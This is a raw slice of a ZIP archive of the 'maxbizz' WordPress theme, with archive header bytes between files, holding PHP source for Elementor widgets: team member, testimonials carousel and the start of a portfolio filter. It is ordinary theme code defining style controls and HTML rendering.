					'{{WRAPPER}} .ot-team' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .ot-team',
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'info_style',
			[
				'label' => esc_html__( 'Info Box', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'heading_info_box',
			[
				'label' => __( 'General', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'text-align: {{VALUE}};',
				],
			]
		);
		$this->add_responsive_control(
			'padding_box',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .team-info' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'bg_box',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .team-info' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'info_box_shadow',
				'selector' => '{{WRAPPER}} .team-info',
			]
		);
		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_responsive_control(
			'title_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team h6' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'title_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team h6, {{WRAPPER}} .ot-team h6 a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label'     => esc_html__( 'Color Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team h6 a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!'  => ''
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name'     => 'title_typography',
				'label'    => esc_html__( 'Typography', 'maxbizz' ),
				'selector' => '{{WRAPPER}} .ot-team h6',
			]
		);

		/* extra */
		$this->add_control(
			'heading_job',
			[
				'label' => __( 'Extra/Job', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_responsive_control(
			'job_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .team-social' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'job_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-info span' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
				[
					'name'     => 'job_typography',
					'label'    => esc_html__( 'Typography', 'maxbizz' ),
					'selector' => '{{WRAPPER}} .team-info span',
				]
		);

		$this->end_controls_section();

		/* socials */
		$this->start_controls_section(
			'icon_style',
			[
				'label' => esc_html__( 'Socials', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_responsive_control(
			'icon_social_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 30,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'margin-right: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_socials',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'icon_social_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'color: {{VALUE}};',
					'{{WRAPPER}} .team-social svg' => 'fill: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_social_bg',
			[
				'label'     => esc_html__( 'Background', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_hover_color',
			[
				'label'     => esc_html__( 'Color Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a:hover' => 'color: {{VALUE}};',
					'{{WRAPPER}} .team-social a:hover svg' => 'fill: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'social_hover_bg',
			[
				'label'     => esc_html__( 'Background Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a:hover' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		
		$photo = Group_Control_Image_Size::get_attachment_image_html( $settings, 'member_image_size', 'member_image' );
		$tname = $settings['member_name'];

		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'm_link', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'm_link', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'm_link', 'rel', 'nofollow' );
			}
			$photo = '<a ' .$this->get_render_attribute_string( 'm_link' ). '>' .$photo. '</a>';
			$tname = '<a ' .$this->get_render_attribute_string( 'm_link' ). '>' .$tname. '</a>';
		}

		?>

		<div class="ot-team team-2 circle-social">
			<div class="team-thumb">
				<?php if( $settings['member_image']['url'] ) { echo $photo; } ?>
			</div>
			<div class="team-info">
				<?php if ( $settings['member_name'] ) { echo '<h6 class="tname">' .$tname. '</h6>'; } ?>
				<?php if ( $settings['member_extra'] ) { echo '<span>' .$settings['member_extra']. '</span>'; } ?>
				<?php if ( ! empty( $settings['social_share'] ) ) : ?>
				<div class="team-social">
					<?php foreach ( $settings['social_share'] as $key => $social ) : ?>
						<?php if ( ! empty( $social['social_link'] ) ) : ?>
							<a <?php if($social['social_link']['is_external'])
							{ echo 'target="_blank"'; }else{ echo 'rel="nofollow"';}?> 
									href="<?php echo $social['social_link']['url'];?>" class="<?php echo strtolower($social['title']);?>">
									<?php Icons_Manager::render_icon( $social['social_icon'], [ 'aria-hidden' => 'true' ] ); ?>
							</a>
						<?php endif; ?>
					<?php endforeach; ?>
				</div>
				<?php endif; ?>
			</div>
		</div>
	        
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Team2 class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Team2() );PK�8FZ�5F��@�@9inc/backend/elementor/widgets/testimonials-carousel-2.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Testimonial Carousel 2
 */
class Maxbizz_Testimonials2 extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'itestimonials2';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Testimonial Carousel 2', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-testimonial-carousel';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'section_testimonials',
			[
				'label' => __( 'Testimonials', 'maxbizz' ),
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials' => 'text-align: {{VALUE}};',
				],
			]
		);
		$repeater = new Repeater();
		$repeater->add_control(
			'timage',
			[
				'label' => __( 'Avatar:', 'maxbizz' ),
				'type' => Controls_Manager::MEDIA,
				'default' => [
					'url' => get_template_directory_uri().'/images/avatar-1.png',
				]
			]
		);

		$repeater->add_control(
			'tname',
			[
				'label' => __( 'Name:', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => 'Emilia Clarke',
			]
		);

		$repeater->add_control(
			'tjob',
			[
				'label' => __( 'Job:', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => 'Developer',
			]
		);
		$repeater->add_control(
			'tcontent',
			[
				'label' => __( 'Content:', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'rows' => '10',
				'default' => '"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."',
			]
		);

		$this->add_control(
		    'testi_slider',
		    [
		        'label'       => '',
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => false,
		        'default'     => [
		            [
		             	'tcontent' => __( '"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."', 'maxbizz' ),
		                'timage'  => [
							'url' => get_template_directory_uri().'/images/avatar-1.png',
						],
						'tname'	  => 'Oliver Simson',
						'tjob'	  => 'Developer'
		 
		            ],
		            [
		             	'tcontent' => __( '"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."', 'maxbizz' ),
		                'timage'  => [
							'url' => get_template_directory_uri().'/images/avatar-1.png',
						],
						'tname'	  => 'Mary Grey',
						'tjob'	  => 'Manager'
		 
		            ],
		            [
		             	'tcontent' => __( '"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."', 'maxbizz' ),
		                'timage'  => [
							'url' => get_template_directory_uri().'/images/avatar-1.png',
						],
						'tname'	  => 'Samanta Fox',
						'tjob'	  => 'Designer'
		 
		            ]
		            
		        ],
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{tname}}}',
		    ]
		);
		$this->add_control(
			'loop',
			[
				'label' => __( 'Loop', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'yes',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'autoplay',
			[
				'label' => __( 'Autoplay', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'timeout',
			[
				'label' => __( 'Autoplay Timeout', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 20000,
						'step' => 1000,
					],
				],
				'default' => [
					'size' => 7000,
				],
				'condition' => [
					'autoplay' => 'true',
				]
			]
		);
		$this->add_control(
			'arrows',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_control(
			'arrow_align',
			[
				'label' => __( 'Arrows Align', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'middle'   => __( 'Middle', 'maxbizz' ),
					'bottom'   => __( 'Bottom', 'maxbizz' ),
				],
				'default' => 'middle',
				'prefix_class' => 'arrows-',
				'condition' => [
					'arrows' => 'true',
				],
			]
		);
		$this->add_control(
			'dots',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_control(
			'dots_style',
			[
				'label' => __( 'Dots Style', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'vertical'   => [
						'title' => esc_html__( 'Vertical', 'maxbizz' ),
						'icon'  => 'fa fa-ellipsis-v',
					],
					'horizontal' => [
						'title' => esc_html__( 'Horizontal', 'maxbizz' ),
						'icon'  => 'fa fa-ellipsis-h',
					],
				],
				'default'      => 'horizontal',
				'prefix_class' => 'dots-',
				'condition' => [
					'dots' => 'true',
				],
			]
		);

		$this->end_controls_section();

		// Styling.
		$this->start_controls_section(
			'style_general',
			[
				'label' => __( 'General', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_control(
			'tcontent_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .ttext' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'content_typography',
				'selector' => '{{WRAPPER}} .ot-testimonials .ttext',
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_tinfo',
			[
				'label' => __( 'Information', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
			]
		);

		/* image */
		$this->add_control(
			'style_timage',
			[
				'label' => __( 'Photo', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);

		$this->add_responsive_control(
			'spacing_img',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'size_units' => [ 'px' ],
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .tphoto' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'image_border_radius',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials img' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'quote_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .tphoto:after' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'quote_bg',
			[
				'label' => __( 'Icon Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials .tphoto:after' => 'background: {{VALUE}};',
				],
			]
		);

		/* name */
		$this->add_control(
			'style_tname',
			[
				'label' => __( 'Name', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'spacing_name',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'size_units' => [ 'px' ],
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials h6' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'name_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials h6' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'name_typography',
				'selector' => '{{WRAPPER}} .ot-testimonials h6',
			]
		);		

		/* job */
		$this->add_control(
			'style_tjob',
			[
				'label' => __( 'Job', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_control(
			'job_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-testimonials span' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'job_typography',
				'selector' => '{{WRAPPER}} .ot-testimonials span',
			]
		);		

		$this->end_controls_section();

		// Dots.
		$this->start_controls_section(
			'navigation_section',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'dots' => 'true',
				],
			]
		);

		$this->add_responsive_control(
			'dots_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}}.dots-horizontal .owl-dots' => 'bottom: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}}.dots-vertical .owl-dots' => 'right: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
            'dots_bgcolor',
            [
                'label' => __( 'Color', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->add_control(
            'dots_active_bgcolor',
            [
                'label' => __( 'Color Active', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot.active span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->end_controls_section();

        // Arrows.
		$this->start_controls_section(
			'style_nav',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'arrows' => 'true',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav .owl-prev' => 'left: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .owl-nav .owl-next' => 'right: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}}.arrows-bottom .owl-nav' => 'bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 30,
						'max' => 70,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'arrow_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_color',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_hcolor',
			[
				'label' => __( 'Color Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_hcolor',
			[
				'label' => __( 'Background Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'radius_arrow',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>

		<div class="ot-testimonials ot-testimonials-carousel-2" data-loop="<?php echo $settings['loop']; ?>" data-auto="<?php echo $settings['autoplay']; ?>" data-time="<?php echo $settings['timeout']['size']; ?>" data-arrows="<?php echo $settings['arrows']; ?>" data-dots="<?php echo $settings['dots']; ?>">
			<div class="owl-carousel owl-theme">
				<?php if ( ! empty( $settings['testi_slider'] ) ) : foreach ( $settings['testi_slider'] as $testi ) : ?>
				<div class="testi-item">
					<?php if($testi['timage']['url']) { ?>
						<div class="tphoto"><img src="<?php echo $testi['timage']['url']; ?>" alt="<?php echo $testi['tname']; ?>"></div>
					<?php } ?>
					<?php if($testi['tcontent']) { echo '<div class="ttext">' .$testi['tcontent']. '</div>'; } ?>			
					<div class="t-head">
						<div class="tinfo">
							<?php if($testi['tname']) { echo '<h6>' .$testi['tname']. '</h6>'; } ?>
							<?php if($testi['tjob']) { echo '<span>' .$testi['tjob']. '</span>'; } ?>
						</div>
					</div>
				</div>
				<?php endforeach; endif; ?>
			</div>				
	    </div>

	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'slider', 'says', 'quote' ];
	}
}
// After the Schedule class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Testimonials2() );PK�8FZ�;�M3e3e2inc/backend/elementor/widgets/portfolio-filter.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Portfolio Filter
 */
class Maxbizz_PortfolioGrid extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'ipfilter';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Portfolio Filter', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-gallery-grid';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'General', 'maxbizz' ),
			]
		);
		$this->add_control(
			'style',
			[
				'label' => __( 'Style Layout', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'p-grid',
				'options' => [
					'p-grid'  	 => __( 'Grid', 'maxbizz' ),
					'p-masonry'  => __( 'Masonry', 'maxbizz' ),
					'p-metro'  => __( 'Metro', 'maxbizz' ),
				],
			]
		);
		$this->add_control(
			'project_cat',
			[
				'label' => __( 'Select Categories', 'maxbizz' ),
				'type' => Controls_Manager::SELECT2,
				'options' => $this->select_param_cate_project(),
				'multiple' => true,
				'label_block' => true,
				'placeholder' => __( 'All Categories', 'maxbizz' ),
				'separator' => 'before',
			]
		);
		$this->add_control(
			'filter',
			[
				'label' => __( 'Show Filter', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'maxbizz' ),
				'label_off' => __( 'Hide', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
				'separator' => 'before',
			]
		);
		$this->add_control(
			'all_text',
			[
				'label' => __( 'All Text', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => 'All',
				'condition' => [
					'filter' => 'yes',
				],
			]
		);
		$this->add_control(
			'count',
			[
				'label' => __( 'Show Count', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'maxbizz' ),
				'label_off' => __( 'Hide', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
				'condition' => [
					'filter' => 'yes',
				],
			]
		);
		$this->add_control(
			'arrow',
			[
				'label' => __( 'Show Arrow', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'maxbizz' ),
				'label_off' => __( 'Hide', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
				'condition' => [
					'filter' => 'yes',
				],
			]
		);
		$this->add_control(
			'column',
			[
				'label' => __( 'Columns', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'pf_3_cols',
				'options' => [
					'pf_2_cols' => __( '2 Column', 'maxbizz' ),
					'pf_3_cols'	=> __( '3 Column', 'maxbizz' ),
					'pf_4_cols' => __( '4 Column', 'maxbizz' ),
					'pf_5_cols' => __( '5 Column', 'maxbizz' ),
				],
				'separator' => 'before',
			]
		);		
		$this->add_responsive_control(
			'w_gaps',
			[
				'label' => __( 'Gap Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .project-item' => 'padding: calc({{SIZE}}{{UNIT}}/2);',
					'{{WRAPPER}} .project-item.double_w .projects-thumbnail img' => 'margin-top: calc(-{{SIZE}}{{UNIT}}/2);',
					'{{WRAPPER}} .projects-grid' => 'margin: calc(-{{SIZE}}{{UNIT}}/2);',
				],
				'separator' => 'before',
			]
		);
		$this->add_control(
			'project_num',
			[
				'label' => __( 'Show Number Projects', 'maxbizz' ),
				'type' => Controls_Manager::NUMBER,
				'default' => '6',
				'separator' => 'before',
			]
		);		
		$this->add_control(
			'load_more',
			[
				'label' => __( 'Load More Button', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => 'Load More',
				'separator' => 'before',
			]
		);
		$this->add_control(
			'loading_more',
			[
				'label' => __( 'Loading Text', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => 'Loading...',
				'condition' => [
					'load_more[value]!' => '',
				]
			]
		);
		$this->add_control(
			'p_more',
			[
				'label' => __( 'Load Number Projects', 'maxbizz' ),
				'type' => Controls_Manager::NUMBER,
				'default' => '3',
				'condition' => [
					'load_more[value]!' => '',
				]
			]
		);
		$this->add_control(
			'layout',
			[
				'label' => __( 'Info Box Style', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'style-1',
				'options' => [
					'style-1'  	=> __( 'Background Overlay', 'maxbizz' ),
					'style-2' 	=> __( 'Background Solid', 'maxbizz' ),
					'style-3' 	=> __( 'Hidden', 'maxbizz' ),
				],
				'separator' => 'before',
			]
		);
		$this->add_control(
			'popup_thumb',
			[
				'label' => __( 'Popup Gallery', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Yes', 'maxbizz' ),
				'label_off' => __( 'No', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
				'condition' => [
					'layout' => 'style-3',
				],
			]
		);
		$this->end_controls_section();

		//Style
		$this->start_controls_section(
			'filter_style_section',
			[
				'label' => __( 'Filter', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
				'condition' => [
					'filter' => 'yes',
				]
			]
		);
		$this->add_responsive_control(
			'filter_align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
